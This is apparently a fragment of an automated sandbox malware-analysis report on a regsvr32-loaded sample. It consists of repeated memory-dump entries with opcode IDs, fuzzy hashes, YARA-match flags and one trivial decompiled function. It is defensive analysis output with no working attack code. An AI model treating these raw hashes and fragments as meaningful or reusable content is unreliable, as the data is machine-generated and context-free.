                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: -h$W
                                                                                                                                                                                                                    • API String ID: 0-4146498651
                                                                                                                                                                                                                    • Opcode ID: ac1beb8efc805ec182d5897ee57bff0eb204918572bad0795e6a59dbf0da3e57
                                                                                                                                                                                                                    • Instruction ID: 3e3b3bc42e908680cfb2489886bd4127d42ce90dfc7e0e8ed4ce54ef72f147dd
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ac1beb8efc805ec182d5897ee57bff0eb204918572bad0795e6a59dbf0da3e57
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3341B4B590038E9FDB44CF68D88A9CE7FF0FB48358F114619F869A6250D3B49664CF85
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: .$fp
                                                                                                                                                                                                                    • API String ID: 0-3298127435
                                                                                                                                                                                                                    • Opcode ID: ddbbea76e87b75a0423c6c5dce58b2b1cb486f12ce18d3dc43adec7097cd1835
                                                                                                                                                                                                                    • Instruction ID: 0ed0161b1f2d5d9de4530fed888b21c1c3081f0418e74fc1edbf52f031111315
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ddbbea76e87b75a0423c6c5dce58b2b1cb486f12ce18d3dc43adec7097cd1835
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4441F4B190470E8BDF88CF64C48A4DE7FB0FB28398F104619E856A6290D3B89665CFC4
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: "$Zs
                                                                                                                                                                                                                    • API String ID: 0-3922668666
                                                                                                                                                                                                                    • Opcode ID: 68d2441b249f9a93f4c72500e977988d29b83f362e05d91f8df6eb9a31c852ba
                                                                                                                                                                                                                    • Instruction ID: f1d62621bd08a38fa15a490595be93b85bae5397fb0987493b8f1264ce03d9fe
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 68d2441b249f9a93f4c72500e977988d29b83f362e05d91f8df6eb9a31c852ba
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 803192B0529380ABC388DF28D19A91EBBE1FBD5708F806A1DF8C286390D374D406CB43
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: XW$s [
                                                                                                                                                                                                                    • API String ID: 0-2366283936
                                                                                                                                                                                                                    • Opcode ID: 76c1b907ae6b42603d5a16b60f951f87ab574e6943cc66960cdc964ad17b59d9
                                                                                                                                                                                                                    • Instruction ID: c8620a86b0501fca327921337904d07bbca0ac58b79dbc40019122cd377fd21c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 76c1b907ae6b42603d5a16b60f951f87ab574e6943cc66960cdc964ad17b59d9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 623190B190478E8FDF48DF28D88949A3BE1FB48304B004A1DFC6AD7250D7B4D665CB95
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: 4V$jn(
                                                                                                                                                                                                                    • API String ID: 0-2529302498
                                                                                                                                                                                                                    • Opcode ID: 4347d8350eb776fef7c9ebb529210ab3cab55532b2ec0dd05afe6f01a2bbb923
                                                                                                                                                                                                                    • Instruction ID: cb5d544f3b4b9f04c9dfd671481ec3bad593690e5eb4dddf862df6e3aa1dae86
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4347d8350eb776fef7c9ebb529210ab3cab55532b2ec0dd05afe6f01a2bbb923
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 17317EB1529381AFC398CF28C48A91ABBE0FBC9318F806A1DF8C686260D774D555CB02
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: '$%6
                                                                                                                                                                                                                    • API String ID: 0-1852427169
                                                                                                                                                                                                                    • Opcode ID: 42a3203eb3ebe9af52f3f94821d08fbcbfa30131473cda762de5c23950ca3f94
                                                                                                                                                                                                                    • Instruction ID: 05249663a0179330ad45d21934dcfd5c9628912d79576b4f5c22a08ed84997fc
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 42a3203eb3ebe9af52f3f94821d08fbcbfa30131473cda762de5c23950ca3f94
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CD316FB5568381ABD388DF28C48A81ABBF1FB89308F806A1DF8C6DB251D775D545CB43
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: uS$J
                                                                                                                                                                                                                    • API String ID: 0-437994327
                                                                                                                                                                                                                    • Opcode ID: a2b51c32bad19ba39d4e427c2f512c2a59b50882f014cb68f936c9e880adca61
                                                                                                                                                                                                                    • Instruction ID: 1701f98d6718d1d11c96ff4afb5a993e63787cf6b6536a5c7ef2d6ea61dcacd3
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a2b51c32bad19ba39d4e427c2f512c2a59b50882f014cb68f936c9e880adca61
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A131C6B190034E8FDB84CF64C88A5DE7FB0FB28358F104619E859A6260D3B88695CFD5
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: +@$`.P
                                                                                                                                                                                                                    • API String ID: 0-1189405855
                                                                                                                                                                                                                    • Opcode ID: a70f442d9e9e175520b0b0d93d41500bfede9fc32031e6ea222cabd22b859c02
                                                                                                                                                                                                                    • Instruction ID: 39de2ea6a026fc69778914cf9e44a5f31bb4615b8119a4e03ad8497b2faa6ad6
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a70f442d9e9e175520b0b0d93d41500bfede9fc32031e6ea222cabd22b859c02
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A1316FB15187848FD348DF28C45941BBBE1BB9C758F804B1DF4CAAA260D778D645CF4A
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: ^$R
                                                                                                                                                                                                                    • API String ID: 0-3595634639
                                                                                                                                                                                                                    • Opcode ID: b7e08d49ea1b5b1d89cab638ecb6b58cb02da954cd334f399a60917b828591f9
                                                                                                                                                                                                                    • Instruction ID: 7dec6e6ff202478201587024085261afee01554c9ae7569198c8fcb843946a7e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b7e08d49ea1b5b1d89cab638ecb6b58cb02da954cd334f399a60917b828591f9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 112180B0528781AFC398DF28D49591FBBF1BB88744F806A1DF8C686390D779D505CB46
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: t^$w
                                                                                                                                                                                                                    • API String ID: 0-1486493484
                                                                                                                                                                                                                    • Opcode ID: d9d2b37262035f156a08dae9f88ea85b7583d03cc1c0d0918aa86d9476248fb5
                                                                                                                                                                                                                    • Instruction ID: 0fcab25796e593e8dfb7fafe86ea51ff53beb953310655f2f877b1f2b437242d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d9d2b37262035f156a08dae9f88ea85b7583d03cc1c0d0918aa86d9476248fb5
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B1219DB090078E8FDB48DF68D8491DE7BB0FB18308F014A59F82996290D3B89665CF85
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: #
                                                                                                                                                                                                                    • API String ID: 0-606707520
                                                                                                                                                                                                                    • Opcode ID: 99547394c1cfeee33f3fbc263d3122085f4524b50faca7c5dbf1af4b9be79401
                                                                                                                                                                                                                    • Instruction ID: afa3dec23448818dac7f873c4ec537a5516871bd4df53a3664d7349f631d385b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 99547394c1cfeee33f3fbc263d3122085f4524b50faca7c5dbf1af4b9be79401
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B5222870D14709EFDB58DFA8C45A49EBBF2FF44348F00816DE80AAB290D7749A19CB85
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                    			E00000001180008D28(long long __rbx, void* __rcx, void* __rdx, long long __rsi, signed int __r8, void* __r9) {
                                                                                                                                                                                                                    				signed long long _t25;
                                                                                                                                                                                                                    				void* _t27;
                                                                                                                                                                                                                    				void* _t30;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				 *((long long*)(_t30 + 8)) = __rbx;
                                                                                                                                                                                                                    				 *(_t30 + 0x10) = _t25;
                                                                                                                                                                                                                    				 *((long long*)(_t30 + 0x18)) = __rsi;
                                                                                                                                                                                                                    				_t27 = (_t25 | 0xffffffff) + 1;
                                                                                                                                                                                                                    				if ( *((intOrPtr*)(__rcx + _t27)) != dil) goto 0x80008d56;
                                                                                                                                                                                                                    				if (_t27 + __rdx -  !__r8 <= 0) goto 0x80008d92;
                                                                                                                                                                                                                    				return __rdx + 0xb;
                                                                                                                                                                                                                    			}






                                                                                                                                                                                                                    0x180008d28
                                                                                                                                                                                                                    0x180008d2d
                                                                                                                                                                                                                    0x180008d32
                                                                                                                                                                                                                    0x180008d56
                                                                                                                                                                                                                    0x180008d5d
                                                                                                                                                                                                                    0x180008d70
                                                                                                                                                                                                                    0x180008d91

                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390586641.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390580183.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390631909.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390642378.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390650965.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 9c9a505e11390fee30cde8d58ba8d3236255a76ec469928530f6db279ba29baa
                                                                                                                                                                                                                    • Instruction ID: 1f7af7de608e037a3e69fafdab2b7a4d19b0596ea53e23cf5e8b59c7fdfa90c1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c9a505e11390fee30cde8d58ba8d3236255a76ec469928530f6db279ba29baa
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D151C432700B9489FBA1DB72A8447DE7BA1B7587D4F148225FE9827B99DF38C605D700
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: ef
                                                                                                                                                                                                                    • API String ID: 0-3522424648
                                                                                                                                                                                                                    • Opcode ID: 63cf04038136136116a979567ba4b26417661d5f843165bc7989bb71bb8234a9
                                                                                                                                                                                                                    • Instruction ID: 79c6bba3d3ccc3776ea533f9c14e2c18972929780cd2a8ac2227d0632d937eea
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 63cf04038136136116a979567ba4b26417661d5f843165bc7989bb71bb8234a9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 550217B0A04709EFDB58DF68C18959EBBF2FB44304F00816DE84AAA360D775DA59CF85
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: x]!-
                                                                                                                                                                                                                    • API String ID: 0-585868058
                                                                                                                                                                                                                    • Opcode ID: cf2a29744dbdbd02a151a4b044d1109f6beb7998a165a5b3606498e8daacfd79
                                                                                                                                                                                                                    • Instruction ID: 29a24287c4a0965d9e48fc4aef88e7ed40d90c7e3ba517fffbd971a97b5ff1d0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cf2a29744dbdbd02a151a4b044d1109f6beb7998a165a5b3606498e8daacfd79
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BED199B1A0060DCFDBA8CF78C44A5DD7BF1FB48308F606129E826AA2B2D7749904CF54
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: }^O
                                                                                                                                                                                                                    • API String ID: 0-3039680174
                                                                                                                                                                                                                    • Opcode ID: 2737519d22680c9269c125336f90b0d45ca51200b7d26ea2addf6a8d31d5b6e5
                                                                                                                                                                                                                    • Instruction ID: bed0271ca8f57dd74b8ab554ee4308eea463c7e7ae3b68ffe138dead7155ea73
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2737519d22680c9269c125336f90b0d45ca51200b7d26ea2addf6a8d31d5b6e5
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9DA17BB2502749CFDB98DF28C69A59D3BE1FF55308F004129FC1E9A2A0D7B4E925CB49
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: RH
                                                                                                                                                                                                                    • API String ID: 0-2975065227
                                                                                                                                                                                                                    • Opcode ID: da44171f9c80a2056ccb259cc2b9eac6e02ade2ac8d9ef905a94791c40a4a894
                                                                                                                                                                                                                    • Instruction ID: f59edb334b4dd3a5a80025c8300c9696d573ff1d96fecdec4e1ba250322e1624
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: da44171f9c80a2056ccb259cc2b9eac6e02ade2ac8d9ef905a94791c40a4a894
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 33513B7111C7448FC7A8DF18D4C66AAB7E1FB84310F90891DE8CEC7251DF74A88A8B46
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: Y
                                                                                                                                                                                                                    • API String ID: 0-579211002
                                                                                                                                                                                                                    • Opcode ID: c7ef7c05ef0c3c9f2aed6826f015ad160cfcc6abce9b29eb71b79f5d508516d5
                                                                                                                                                                                                                    • Instruction ID: 6fabb2e28b0b09a321ef3a457689e9b530569e6d5040c42668a8730111e0f18e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c7ef7c05ef0c3c9f2aed6826f015ad160cfcc6abce9b29eb71b79f5d508516d5
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4C51F4715107898BDB98DF28C88A0DD3BA1FB4931CF125328FD8EA62A1D77CD845CB49
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: vOs
                                                                                                                                                                                                                    • API String ID: 0-1852020951
                                                                                                                                                                                                                    • Opcode ID: 0a3c35978ef4d06ef910e88490b5bce2e9beff051be12035b9eadbcefa2f22bf
                                                                                                                                                                                                                    • Instruction ID: 6f19c2f26fdef9e1bff82d98e95051af84b0a00ee82cf34a8d1c4c3c6fc216ed
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0a3c35978ef4d06ef910e88490b5bce2e9beff051be12035b9eadbcefa2f22bf
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B2618DB190030E8FDB49CF68D48A5CE7FB0FB64398F204519F845A6260D7B996A8CFD5
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: *)
                                                                                                                                                                                                                    • API String ID: 0-1811957435
                                                                                                                                                                                                                    • Opcode ID: c39f41b8af2b9280dd7c00c4ba0ddd05394017a856c7f82ca50d576e38ac2643
                                                                                                                                                                                                                    • Instruction ID: 9fe62251a56e68faddf0cf4890dc8a00a00c4d7eb9981b42a7accbd353065773
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c39f41b8af2b9280dd7c00c4ba0ddd05394017a856c7f82ca50d576e38ac2643
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FA31933061CB888FC728DF29D08556AB7E1FB99301F504B6EE58AC7365DB70D806CB82
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: t
                                                                                                                                                                                                                    • API String ID: 0-1935021737
                                                                                                                                                                                                                    • Opcode ID: 783391770682b9c9d34a01018b97ccb4612aed757a5715f7015a6466eeb6abdd
                                                                                                                                                                                                                    • Instruction ID: 53dfd0684090f39aae0f769ac6af390ae62d672f471cb79d1eef1afdf69dd64b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 783391770682b9c9d34a01018b97ccb4612aed757a5715f7015a6466eeb6abdd
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A931903021CB448FE768DF2CD48516ABBE1FB96354F104A6DE5CAC7266D770D805CB82
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: __
                                                                                                                                                                                                                    • API String ID: 0-2267946753
                                                                                                                                                                                                                    • Opcode ID: 8f9b035c25ddab069e89f1d5b32d9e06551c62a3022c943f576078da68d92037
                                                                                                                                                                                                                    • Instruction ID: 19983eda61f8ad0d02124a0bc8167013160560707c89615966f89d9a14d68dd5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8f9b035c25ddab069e89f1d5b32d9e06551c62a3022c943f576078da68d92037
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B641F070508B848BE758DF29C18A41BBBF2FBCA704F500A2DF69A8B360C775D845CB42
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: GSn
                                                                                                                                                                                                                    • API String ID: 0-1733515909
                                                                                                                                                                                                                    • Opcode ID: 120b4183c770ef369911dc760361451600c2e99f203226371e5481c8821bf4d7
                                                                                                                                                                                                                    • Instruction ID: 81952ee9f549be1b4743e0a6b63c6d4ea35452dc54660227ede74ea4b76c6e91
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 120b4183c770ef369911dc760361451600c2e99f203226371e5481c8821bf4d7
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0651D7B090038E8FDF48DF64C84A5DE7BB1FB58358F10461DEC66A6250D3B89664CF84
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
